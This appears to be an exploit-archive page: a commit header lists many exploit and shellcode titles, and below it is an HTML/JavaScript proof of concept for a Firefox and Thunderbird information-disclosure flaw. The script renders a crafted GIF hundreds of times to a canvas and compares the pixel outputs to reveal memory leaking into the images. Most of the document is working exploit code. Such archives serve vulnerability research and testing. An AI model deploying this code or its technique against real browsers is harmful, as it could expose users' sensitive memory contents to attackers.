880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
140 lines
No EOL
2.5 KiB
JavaScript
140 lines
No EOL
2.5 KiB
JavaScript
source: https://www.securityfocus.com/bid/69525/info
|
|
|
|
Mozilla Firefox and Thunderbird are prone to an information-disclosure vulnerability.
|
|
|
|
Attackers can exploit this issue to disclose sensitive information that may aid in further attacks.
|
|
|
|
This issue is fixed in:
|
|
|
|
Firefox 32
|
|
Firefox ESR 31.1
|
|
Thunderbird 31.1
|
|
|
|
<style>
|
|
body {
|
|
background-color: #d0d0d0;
|
|
}
|
|
|
|
img {
|
|
border: 1px solid teal;
|
|
margin: 1ex;
|
|
}
|
|
|
|
canvas {
|
|
border: 1px solid crimson;
|
|
margin: 1ex;
|
|
}
|
|
</style>
|
|
|
|
<body onload="set_images()">
|
|
|
|
<div id="status">
|
|
</div>
|
|
|
|
<div id="image_div">
|
|
</div>
|
|
|
|
<canvas height=32 width=32 id=cvs>
|
|
</canvas>
|
|
|
|
<h2>Variants:</h2>
|
|
|
|
<ul id="output">
|
|
</ul>
|
|
|
|
<script>
|
|
var c = document.getElementById('cvs');
|
|
var ctx = c.getContext('2d');
|
|
|
|
var loaded = 0;
|
|
var image_obj = [];
|
|
var USE_IMAGES = 300;
|
|
|
|
function check_results() {
|
|
|
|
var uniques = [];
|
|
|
|
uniques.push(image_obj[0].imgdata);
|
|
|
|
document.getElementById('output').innerHTML +=
|
|
'<img src="' + image_obj[0].imgdata + '">';
|
|
|
|
for (var i = 1; i < USE_IMAGES; i++) {
|
|
|
|
if (image_obj[0].imgdata != image_obj[i].imgdata) {
|
|
|
|
for (var j = 1; j < uniques.length; j++)
|
|
if (uniques[j] == image_obj[i].imgdata) break;
|
|
|
|
if (j == uniques.length) {
|
|
|
|
uniques.push(image_obj[i].imgdata);
|
|
|
|
document.getElementById('output').innerHTML +=
|
|
'<img src="' + image_obj[i].imgdata + '">';
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
}
|
|
|
|
if (uniques.length > 1)
|
|
alert('The image has ' + uniques.length + ' variants when rendered. Looks like you have a problem.');
|
|
else
|
|
alert('The image has just one variant when rendered. You\'re probably OK.');
|
|
|
|
}
|
|
|
|
|
|
function count_image() {
|
|
|
|
loaded++;
|
|
|
|
ctx.clearRect(0, 0, 32, 32);
|
|
|
|
try {
|
|
ctx.drawImage(this, 0, 0, 32, 32);
|
|
} catch (e) { }
|
|
|
|
this.imgdata = c.toDataURL();
|
|
|
|
if (loaded == USE_IMAGES) check_results();
|
|
|
|
}
|
|
|
|
|
|
function set_images() {
|
|
|
|
loaded = 0;
|
|
create_images();
|
|
|
|
for (var i = 0; i < USE_IMAGES; i++)
|
|
image_obj[i].src = './id:000110,src:000023.gif?' + Math.random();
|
|
|
|
}
|
|
|
|
|
|
function create_images() {
|
|
|
|
for (var i = 0; i < USE_IMAGES; i++) {
|
|
|
|
image_obj[i] = new Image();
|
|
image_obj[i].height = 32;
|
|
image_obj[i].width = 32;
|
|
image_obj[i].onerror = count_image;
|
|
image_obj[i].onload = count_image;
|
|
|
|
document.getElementById('image_div').appendChild(image_obj[i]);
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
</script>
|
|
|
|
|
|
<iframe src='http://www.example.com/'></iframe> |